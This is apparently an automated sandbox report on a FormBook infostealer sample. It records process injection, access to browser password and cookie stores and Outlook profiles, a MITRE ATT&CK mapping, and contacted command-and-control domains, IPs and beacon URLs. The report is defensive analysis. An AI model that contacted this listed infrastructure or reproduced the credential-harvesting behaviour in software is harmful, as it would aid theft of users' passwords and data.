Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process created: C:\Users\user\Desktop\SLq0ulC3Wf.exe "C:\Users\user\Desktop\SLq0ulC3Wf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process created: C:\Users\user\Desktop\SLq0ulC3Wf.exe "C:\Users\user\Desktop\SLq0ulC3Wf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process created: C:\Users\user\Desktop\SLq0ulC3Wf.exe "C:\Users\user\Desktop\SLq0ulC3Wf.exe"	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	Process created: C:\Windows\SysWOW64\DpiScaling.exe "C:\Windows\SysWOW64\DpiScaling.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: aVqyFNVyPiTfi.exe, 0000000A.00000002.2677820261.0000000001290000.00000002.00000001.00040000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000A.00000000.1642084860.0000000001291000.00000002.00000001.00040000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000C.00000000.1817983347.0000000001291000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: aVqyFNVyPiTfi.exe, 0000000A.00000002.2677820261.0000000001290000.00000002.00000001.00040000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000A.00000000.1642084860.0000000001291000.00000002.00000001.00040000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000C.00000000.1817983347.0000000001291000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: aVqyFNVyPiTfi.exe, 0000000A.00000002.2677820261.0000000001290000.00000002.00000001.00040000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000A.00000000.1642084860.0000000001291000.00000002.00000001.00040000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000C.00000000.1817983347.0000000001291000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: aVqyFNVyPiTfi.exe, 0000000A.00000002.2677820261.0000000001290000.00000002.00000001.00040000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000A.00000000.1642084860.0000000001291000.00000002.00000001.00040000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000C.00000000.1817983347.0000000001291000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Queries volume information: C:\Users\user\Desktop\SLq0ulC3Wf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 7.2.SLq0ulC3Wf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SLq0ulC3Wf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2678439595.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1717773324.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2678329827.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1717366921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2681761617.0000000005110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2678402729.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1726811680.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\DpiScaling.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 7.2.SLq0ulC3Wf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SLq0ulC3Wf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2678439595.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1717773324.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2678329827.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1717366921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2681761617.0000000005110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2678402729.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1726811680.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SLq0ulC3Wf.exe	76%	Virustotal		Browse
SLq0ulC3Wf.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos
SLq0ulC3Wf.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.deadshoy.tech/k45z/	0%	Avira URL Cloud	safe
http://www.did-ready.info/a8nx/?5t=+ijtfUcEkczZonQRTZPeCxhL9X8p6elqT8rXZI1bhPKlL7JJ7DdsZ8/v+QWmOaPAOWgXu8Ydnt1hKQQAhZJ0bRYUhQdmCWF4tv0qdRrQh94dvG1MWUFKQN4qjMNIFbhY/Q==&HBa8C=1TmdP6ixExB8DV	0%	Avira URL Cloud	safe
http://www.accusolution.pro/8s4j/	100%	Avira URL Cloud	malware
http://www.myfastuploader.sbs/wzdf/	0%	Avira URL Cloud	safe
https://www.myfastuploader.sbs/wzdf/?5t=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/	0%	Avira URL Cloud	safe
http://www.accusolution.pro	100%	Avira URL Cloud	malware
http://www.futurexz.xyz/bhaz/	0%	Avira URL Cloud	safe
http://www.deadshoy.tech/k45z/?5t=Hhv1IBz65eD70HjhCg9ywsDykByP0cXiBlXjDO6l9OvALlXnnYphilqBzmviCqMlGACPw9TT4DmHF7/s/4Bbg8ZTQ9OS97MohncYSMMJNOepQVGz5jqmT1tBqJmbKI6tkg==&HBa8C=1TmdP6ixExB8DV	0%	Avira URL Cloud	safe
http://www.futurexz.xyz/bhaz/?HBa8C=1TmdP6ixExB8DV&5t=d3C+EkBuN5s1g6Sv3GF5Q4rw9r47fZ2/rALJg63gfJf8n+sIpfLA3JNW/O2di/HTM2qVhQtzuGVJ+YLVpF6sno4g+T4cgfV0eNxqgD8f0kMZrnEaQO6gqyS7ZB9ZPZm+NQ==	0%	Avira URL Cloud	safe
http://www.myfastuploader.sbs/wzdf/?5t=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/9Z3uNAs5avQYsDK6NbrpTb32/24MPrQp38e7p8QhR5ymoCju/e2gY+T/ibiLi+AS7/Eveg==&HBa8C=1TmdP6ixExB8DV	0%	Avira URL Cloud	safe
http://www.newbh.pro/67jc/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.newbh.pro	176.57.65.76	true	true	unknown
www.deadshoy.tech	199.59.243.228	true	true	unknown
accusolution.pro	185.68.108.243	true	true	unknown
myfastuploader.sbs	136.243.225.5	true	true	unknown
www.did-ready.info	194.245.148.189	true	false	unknown
www.futurexz.xyz	209.74.79.40	true	true	unknown
www.myfastuploader.sbs	unknown	unknown	false	unknown
www.spindisclite.store	unknown	unknown	false	unknown
www.accusolution.pro	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.myfastuploader.sbs/wzdf/	true	Avira URL Cloud: safe	unknown
http://www.did-ready.info/a8nx/?5t=+ijtfUcEkczZonQRTZPeCxhL9X8p6elqT8rXZI1bhPKlL7JJ7DdsZ8/v+QWmOaPAOWgXu8Ydnt1hKQQAhZJ0bRYUhQdmCWF4tv0qdRrQh94dvG1MWUFKQN4qjMNIFbhY/Q==&HBa8C=1TmdP6ixExB8DV	false	Avira URL Cloud: safe	unknown
http://www.futurexz.xyz/bhaz/	true	Avira URL Cloud: safe	unknown
http://www.deadshoy.tech/k45z/?5t=Hhv1IBz65eD70HjhCg9ywsDykByP0cXiBlXjDO6l9OvALlXnnYphilqBzmviCqMlGACPw9TT4DmHF7/s/4Bbg8ZTQ9OS97MohncYSMMJNOepQVGz5jqmT1tBqJmbKI6tkg==&HBa8C=1TmdP6ixExB8DV	true	Avira URL Cloud: safe	unknown
http://www.deadshoy.tech/k45z/	true	Avira URL Cloud: safe	unknown
http://www.accusolution.pro/8s4j/	true	Avira URL Cloud: malware	unknown
http://www.futurexz.xyz/bhaz/?HBa8C=1TmdP6ixExB8DV&5t=d3C+EkBuN5s1g6Sv3GF5Q4rw9r47fZ2/rALJg63gfJf8n+sIpfLA3JNW/O2di/HTM2qVhQtzuGVJ+YLVpF6sno4g+T4cgfV0eNxqgD8f0kMZrnEaQO6gqyS7ZB9ZPZm+NQ==	true	Avira URL Cloud: safe	unknown
http://www.myfastuploader.sbs/wzdf/?5t=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/9Z3uNAs5avQYsDK6NbrpTb32/24MPrQp38e7p8QhR5ymoCju/e2gY+T/ibiLi+AS7/Eveg==&HBa8C=1TmdP6ixExB8DV	true	Avira URL Cloud: safe	unknown
http://www.newbh.pro/67jc/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	DpiScaling.exe, 0000000B.00000002.2680595125.0000000005438000.00000004.10000000.00040000.00000000.sdmp, DpiScaling.exe, 0000000B.00000002.2682365222.00000000075F0000.00000004.00000800.00020000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000C.00000002.2679893517.00000000033E8000.00000004.00000001.00040000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://joker.com/?pk_campaign=Parking&pk_kwd=text	DpiScaling.exe, 0000000B.00000002.2680595125.0000000005114000.00000004.10000000.00040000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000C.00000002.2679893517.00000000030C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2046769204.000000003A514000.00000004.80000000.00040000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.myfastuploader.sbs/wzdf/?5t=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/	DpiScaling.exe, 0000000B.00000002.2680595125.00000000058EE000.00000004.10000000.00040000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000C.00000002.2679893517.000000000389E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.accusolution.pro	aVqyFNVyPiTfi.exe, 0000000C.00000002.2681761617.00000000051A9000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SLq0ulC3Wf.exe, 00000000.00000002.1435217400.00000000033E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	DpiScaling.exe, 0000000B.00000003.1941425877.00000000079B8000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
176.57.65.76	www.newbh.pro	Bosnia and Herzegowina	47959	TELINEABA	true
136.243.225.5	myfastuploader.sbs	Germany	24940	HETZNER-ASDE	true
194.245.148.189	www.did-ready.info	Germany	5517	CSLDE	false
209.74.79.40	www.futurexz.xyz	United States	31744	MULTIBAND-NEWHOPEUS	true
199.59.243.228	www.deadshoy.tech	United States	395082	BODIS-NJUS	true
185.68.108.243	accusolution.pro	Spain	201446	PROFESIONALHOSTINGES	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588792
Start date and time:	2025-01-11 05:33:41 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SLq0ulC3Wf.exe renamed because original name is a hash value
Original Sample Name:	2a39456047c17169357a4065aaae2dace49a63d160633f59c9049f6eabc9cc4f.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@15/7@7/6
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 92% Number of executed functions: 93 Number of non-executed functions: 284
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 172.202.163.200
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:34:36	API Interceptor	1x Sleep call for process: SLq0ulC3Wf.exe modified
23:34:38	API Interceptor	21x Sleep call for process: powershell.exe modified
23:35:45	API Interceptor	1674924x Sleep call for process: DpiScaling.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
